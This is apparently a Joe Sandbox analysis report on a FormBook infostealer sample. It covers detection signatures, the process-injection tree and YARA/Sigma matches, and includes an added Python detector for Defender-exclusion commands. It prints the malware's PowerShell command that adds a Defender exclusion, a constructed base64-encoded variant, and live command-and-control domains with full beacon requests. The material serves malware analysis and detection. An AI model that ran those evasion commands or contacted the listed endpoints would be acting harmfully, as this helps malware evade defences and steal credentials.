
Windows Analysis Report
mKv3sKQ5Q4E7waF.exe

Overview

General Information

Sample name: mKv3sKQ5Q4E7waF.exe
Analysis ID: 1640362
MD5: 5e0360cda226b51b2ecd311012501c54
SHA1: 2eba3545d3da64b1dc906373e542cfe2abd456f2
SHA256: 0ffb85454f582cc85ee5b77282c62c16c3f845706a850fb2b096ce287494073f
Tags: exe, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mKv3sKQ5Q4E7waF.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe" MD5: 5E0360CDA226B51B2ECD311012501C54)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2692 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • mKv3sKQ5Q4E7waF.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe" MD5: 5E0360CDA226B51B2ECD311012501C54)
      • vnV7v1GankdEyS2eDT.exe (PID: 5768 cmdline: "C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\qX79VMgLV3tGr.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • help.exe (PID: 7036 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • vnV7v1GankdEyS2eDT.exe (PID: 4376 cmdline: "C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\Wzpz6Kyz4mz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7072 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 2848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(4 further memory-dump entries not shown on this page)

Source | Rule | Description | Author | Strings
3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ParentImage: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe, ParentProcessId: 6760, ParentProcessName: mKv3sKQ5Q4E7waF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ProcessId: 6920, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ParentImage: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe, ParentProcessId: 6760, ParentProcessName: mKv3sKQ5Q4E7waF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ProcessId: 6920, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ParentImage: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe, ParentProcessId: 6760, ParentProcessName: mKv3sKQ5Q4E7waF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ProcessId: 6920, ProcessName: powershell.exe
Source: Process started | Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2848, ProcessName: svchost.exe
                No Suricata rule has matched
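The two Sigma hits listed under Signatures (Powershell Defender Exclusion and Powershell Base64 Encoded MpPreference Cmdlet) both key on the process-creation event above. The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules' own definitions: it re-implements the core of that logic as a check over process-creation events. The plain-text branch looks for Add-MpPreference with an -Exclusion* switch; the second branch reproduces the idea behind Sigma's base64offset modifier, which derives the three base64 encodings a string can take depending on its byte alignment inside a longer blob, so that the same cmdlet hidden behind -EncodedCommand (UTF-16LE) is caught as well. The first event copies the command line from this report (PID 6920); the other two events, the switch list and the rule names are my constructions and approximations, not the public rules verbatim.

```python
import base64

# Process-creation events.  The first copies the command line from this
# report (PID 6920); the other two are constructed for the example.
def encode_command(script: str) -> str:
    """Base64 a script the way powershell.exe -EncodedCommand expects it (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"ProcessId": 6920,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"'},
    {"ProcessId": 7001,   # constructed: same cmdlet hidden behind -EncodedCommand
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                    + encode_command(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"')},
    {"ProcessId": 7002,   # constructed: benign, only reads the exclusion list
     "CommandLine": "powershell.exe Get-MpPreference | Select-Object ExclusionPath"},
]


def base64offset_variants(value: str, encoding: str = "utf-8") -> list:
    """The three base64 strings that can contain `value` wherever it sits inside
    a longer encoded blob (the logic behind Sigma's base64offset modifier).

    A byte's position modulo 3 decides which base64 characters it shares with
    its neighbours.  Offset i prepends i filler bytes, encodes, then drops the
    leading characters polluted by the filler and the trailing characters
    (including '=' padding) polluted by whatever follows the value.
    """
    raw = value.encode(encoding)
    start = (0, 2, 3)          # leading chars shared with the i filler bytes
    end = (None, -3, -2)       # trailing chars shared with the next byte, by (len + i) % 3
    variants = []
    for i in range(3):
        enc = base64.b64encode(b"\x00" * i + raw).decode()
        variants.append(enc[start[i]:end[(len(raw) + i) % 3]])
    return variants


EXCLUSION_SWITCHES = (" -ExclusionPath ", " -ExclusionExtension ",
                      " -ExclusionProcess ", " -ExclusionIpAddress ")
# PowerShell encodes scripts as UTF-16LE, so the encoded cmdlet name never
# resembles the base64 of its ASCII spelling; derive the variants from UTF-16LE.
MPPREFERENCE_B64 = [v for cmdlet in ("Add-MpPreference", "Set-MpPreference")
                    for v in base64offset_variants(cmdlet, "utf-16le")]


def match_event(event: dict) -> list:
    """Rule names (my approximation of the report's two Sigma rules) that fire on one event."""
    cmd = event.get("CommandLine", "")
    hits = []
    if "Add-MpPreference" in cmd and any(s in cmd for s in EXCLUSION_SWITCHES):
        hits.append("Powershell Defender Exclusion")
    if any(v in cmd for v in MPPREFERENCE_B64):
        hits.append("Powershell Base64 Encoded MpPreference Cmdlet")
    return hits


def scan(events) -> dict:
    """Map ProcessId -> matched rule names, keeping only events that fired."""
    return {e["ProcessId"]: m for e in events if (m := match_event(e))}


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The ASCII variant at offset 0 of Add-MpPreference is QWRkLU1wUHJlZmVyZW5jZ (the trailing "Q==" is dropped because its bits would be shared with the next byte); the UTF-16LE variants are what an -EncodedCommand blob actually contains. Feeding the encoded event through the matcher fires only the base64 rule, while the report's plain-text event fires only the exclusion rule.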


                AV Detection

Source: http://www.urbagan.net/yas3/?-pKpW8DH=ACLzix20cds7up7/46wlnsk6Nsv7Q3fKxrYR6p4MvFRMrxvnqM2s8zT2fyP6MdeU99jzpRbWnk1TsskmEkSk+klaL10/tPDTZw0TZxu7M66aW95YiWhTdAsyQYGNea7whl19YBdcnHDA&h4NHh=CjqdRB50 | Avira URL Cloud: Label: malware
Source: http://www.dresses-executive.sbs/iz5a/?-pKpW8DH=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCznnF7txmJdA6nURY4ZLjEDGE+TJ0tJRN2+G80EJqPAzx3giZePzIZpu5v&h4NHh=CjqdRB50 | Avira URL Cloud: Label: malware
Source: http://www.9c555697-d77.cfd/amnq/?-pKpW8DH=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX60VE5hvGPdmJDr2mNsBNkDWCXKYr/xgONaH0k++AL0/KjcEIbPvoemI&h4NHh=CjqdRB50 | Avira URL Cloud: Label: malware
Source: http://www.lingkungan.xyz/1vho/ | Avira URL Cloud: Label: malware
Source: http://www.urbagan.net | Avira URL Cloud: Label: malware
Source: http://www.urbagan.net/yas3/ | Avira URL Cloud: Label: malware
Source: http://www.dresses-executive.sbs/iz5a/ | Avira URL Cloud: Label: malware
Source: http://www.warc.tech/eorp/ | Avira URL Cloud: Label: malware
Source: http://www.lingkungan.xyz/1vho/?h4NHh=CjqdRB50&-pKpW8DH=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMWXJwM/R5wmPMsphCmlqyVD/VnC3OOQP4tqQTknru7tPs2zTypQNyu+Ou | Avira URL Cloud: Label: malware
Source: http://www.9c555697-d77.cfd/amnq/ | Avira URL Cloud: Label: malware
Source: mKv3sKQ5Q4E7waF.exe | ReversingLabs: Detection: 25%
Source: Yara match | File source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: mKv3sKQ5Q4E7waF.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: mKv3sKQ5Q4E7waF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: zpaD.pdbSHA256 source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: wntdll.pdbUGP source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: mKv3sKQ5Q4E7waF.exe, mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: help.pdbGCTL source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: zpaD.pdb source: mKv3sKQ5Q4E7waF.exe
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290284490.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000000.1066377820.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp (this PDB path belongs to Joe Sandbox's own FakeChrome build, so vnV7v1GankdEyS2eDT.exe, MD5 9C98D1A23EFAF1B156A130CEA7D2EE3A in the process tree, is a copy of the analysis VM's stand-in Chrome binary launched from a randomly named directory, not a payload carried by the sample; treat that hash as a sandbox artifact rather than an indicator)
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0061C3D0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0061C3D0
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then xor eax, eax | 6_2_00609E10
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop edi | 6_2_0060E064
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_030704F8

                Networking

                Source: DNS query: www.quantumxr.xyz
                Source: DNS query: www.lingkungan.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.bigjoy.xyz
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 77.222.42.122
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (5 entries)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (17 entries)
Source: global traffic | HTTP traffic detected: GET /s7xs/?h4NHh=CjqdRB50&-pKpW8DH=xcMJ8dHCBqmRN/v8A9X3SQFFEvK7hDYfq5HSOXvlsOwc7SqmLqODR0c7NEVchTWYh0j1Mb1wg8ygaKr+DeyKnKX/VFoWrG0/0to2sV5gOlXJrZtukXINp5PdkZYXOUWpsvbEdBUxzLQf HTTP/1.1 | Host: www.paoginbcn.net | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /bd6u/?-pKpW8DH=C699ZhSusvxhZ79sGIyx/jAntutNR/TTEg+UR4pbUkUSuK2bkyYOQkP8ElyXgHmB/M1sj/T1LBz/t4SesGYN437HCtRo9bJo6szGBS8vkx7LoKT/bHqa4TC4HXUD/hV5Q4SxqpDPRpa6&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.quantumxr.xyz | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /amnq/?-pKpW8DH=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX60VE5hvGPdmJDr2mNsBNkDWCXKYr/xgONaH0k++AL0/KjcEIbPvoemI&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.9c555697-d77.cfd | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /ra8c/?-pKpW8DH=FCJW9xjil5qugBSRiQA6TYMmKzFBES9fh1uxvnoCRwKx+kuUdPq0TiEctR6JEKFXsUKvjlQG/5hIwT1d+q0j/yyTKIQNakuol+DYV841VsXBTs/zYozRTx2KiZVGjhUiY58iKq5KEGNO&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.thefounder.ceo | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /1vho/?h4NHh=CjqdRB50&-pKpW8DH=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMWXJwM/R5wmPMsphCmlqyVD/VnC3OOQP4tqQTknru7tPs2zTypQNyu+Ou HTTP/1.1 | Host: www.lingkungan.xyz | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /hb3t/?-pKpW8DH=9KXb6qBxMll9f4x2p0s5tKTO97R+nUCdHsPBbbY6H5bX94ZOqhaq0szPM69Abc7OasYSx8zxfbGo3o80iaP4ed5g4Ti6olHT9SxznxxBMTlQ0CRheWXTuutj8zxwZ69FGcNV0F6pXUDQ&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.nexstep.live | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /tjx1/?h4NHh=CjqdRB50&-pKpW8DH=TG2MQl+RzAjlK5FmB4vIzhZYom3se92/rpfSq0JUGMuU4ShRAQPdpLxTTwO0YSgd+qc50+/9J/dCy7dn7Bv3GAdvMpjdJpfd+8chARZ6BPh/No9Yy5eX8eWfjgCUaO2TCsF9Jby+rJ/P HTTP/1.1 | Host: www.031235045.xyz | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /freb/?-pKpW8DH=CrVXR/tglfI2Tw26jNQpKKBtePCBpzNCR35NxdnTgAeIWyg43F22Hb45FwdJBD3fE3YCNnYYiArhrGggW044LnZPRhD2gEKNoNKv/RNJOqIEPytCKbL3RbHBAGiHFXoGI2TcX3ZTQY9a&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.truay.site | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /0zpa/?-pKpW8DH=Arj7slIyYHdYIdItBvD/yug6zK1ulobzsX4Q/fC0Gb6wamVG7muUcu/e1DE+A+CXMGlNeQBc70XQmb9DcRsonJvjtdzRID2hXiWlnQRUwct2/YNVsyAKpOluH5xRyfz88tGlsKtx/XYu&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.playav.mobi | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /eorp/?-pKpW8DH=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfE87V+mS69MNpvLKd/EpLTS6yxwIVBFJ/XpruYXDYUXYJbSgEKcgm0SJyZ&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.warc.tech | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /mik0/?-pKpW8DH=MZodc8OlGt8s8YeqJAB5YyMn8PO8JKHrs5+7JFO7C2wIMEQuo0OiAGAhRRReq0xMS+0PcdUJklm1hYNxl2dPE6zPsBmZ9ppGufPromwRxu5hQEGgj2uwENfLfGvU7GvMY+qWV8cblFlD&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.448828.party | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /iz5a/?-pKpW8DH=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCznnF7txmJdA6nURY4ZLjEDGE+TJ0tJRN2+G80EJqPAzx3giZePzIZpu5v&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.dresses-executive.sbs | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /7ao9/?-pKpW8DH=0FCTgvFtttb/k3M7HElyhfE+VLi2VS+ZsM+qrGqWDjjgnBB1I9XqVJ2YzS96KRFB5ygIP+7H9rFjKFpZ8FUygvownFTL+yg1iooSOuAyiZIOTQmS00VXEe+NTm2b311PAKwxMK+gvSOH&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.bigjoy.xyz | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /vrgg/?-pKpW8DH=0tsLL7PeGZ+MuFGr0RKEmyjy7iCQkNx0y+nhDKeS4rHoxyWsWUYtFIECofPisLkh7nEPrXMRdcFp7EDKjYXYHSSQd1LEjHxQFvDjar1skbum6JTSKq8y/ARbOypI5dDrQjDM0sB3C/xB&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.klass.team | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | HTTP traffic detected: GET /1hc0/?-pKpW8DH=qe5zJE97Y1Od+1YRU3JU1DJQ64YgQhmRIfUAmxXzD+vXbpn92cvHcFVamkgodqv0YEztxSYAbCj5dzR2TtR9TzcP+/xPPbxPboOsD6tpgl9cgrlKfZviUapeY6RkqHsd0IrBGJCMPKCq&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.calimade.net | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
